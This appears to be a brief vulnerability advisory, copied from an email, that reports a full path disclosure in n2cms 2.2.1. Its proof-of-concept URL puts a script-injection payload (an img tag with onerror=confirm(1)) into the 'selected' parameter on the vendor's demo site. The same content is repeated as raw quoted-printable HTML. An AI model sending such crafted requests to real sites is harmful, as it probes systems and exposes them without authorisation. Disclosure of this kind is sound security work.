n2cms version 2.2.1 suffers from a path disclosure vulnerability.
3999ea7bf894cbb36512a747568273dd9e6751f2d406d253df2dbab8f24da389
# Affected software: n2cms
# Type of vulnerability:full path disclosure
# URL:n2cms.com
# Discovered by: provensec
# Website: provensec.com
#version: *2.2.1* <http://n2cms.codeplex.com/releases>
# Proof of concept
http://demo.n2cms.com/N2/Files/FileSystem/File.aspx?selected=%2fupload%2f%22%3E%3Cimg%20src=d%20onerror=confirm(1);%3E1.php%2f
manipulating the selected paramter will splash error which discloses system
path
--047d7bd6bb5a40b6a5051578e115
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
<div dir=3D"ltr"><div class=3D"gmail_default" style><span style=3D"font-fam=
ily:'comic sans ms',sans-serif"></span><font face=3D"comic sans ms,=
sans-serif"># Affected software: n2cms</font></div><div class=3D"gmail_def=
ault" style><font face=3D"comic sans ms, sans-serif"># Type of vulnerabilit=
y:full path disclosure</font></div><div class=3D"gmail_default" style><font=
face=3D"comic sans ms, sans-serif"># URL:<a href=3D"http://n2cms.com">n2cm=
s.com</a></font></div><div class=3D"gmail_default" style><font face=3D"comi=
c sans ms, sans-serif"># Discovered by: provensec</font></div><div class=3D=
"gmail_default" style><font face=3D"comic sans ms, sans-serif"># Website: <=
a href=3D"http://provensec.com">provensec.com</a></font></div><div class=3D=
"gmail_default" style><font face=3D"comic sans ms, sans-serif"><br></font><=
/div><div class=3D"gmail_default" style><font face=3D"comic sans ms, sans-s=
erif">#version:=A0</font><a href=3D"http://n2cms.codeplex.com/releases" sty=
le=3D"color:rgb(0,150,219);text-decoration:none;font-family:Georgia,serif;f=
ont-size:14.3999996185303px"><strong>2.2.1</strong></a><span style=3D"color=
:rgb(51,51,51);font-family:Georgia,serif;font-size:14.3999996185303px">=A0<=
/span></div><div class=3D"gmail_default" style><font face=3D"comic sans ms,=
sans-serif"># Proof of concept</font><span style=3D"font-family:'comic=
sans ms',sans-serif"></span></div><div class=3D"gmail_default" style><=
span style=3D"font-family:'comic sans ms',sans-serif"><br></span></=
div><div class=3D"gmail_default" style><font face=3D"comic sans ms, sans-se=
rif"><a href=3D"http://demo.n2cms.com/N2/Files/FileSystem/File.aspx?selecte=
d=3D%2fupload%2f%22%3E%3Cimg%20src=3Dd%20onerror=3Dconfirm(1);%3E1.php%2f">=
http://demo.n2cms.com/N2/Files/FileSystem/File.aspx?selected=3D%2fupload%2f=
%22%3E%3Cimg%20src=3Dd%20onerror=3Dconfirm(1);%3E1.php%2f</a><br></font><br=
><br></div><div class=3D"gmail_default" style><br></div><div class=3D"gmail=
_default" style><br>manipulating the selected paramter will splash error wh=
ich discloses system path=A0</div><div class=3D"gmail_default" style><br></=
div><div class=3D"gmail_default" style>=A0</div></div>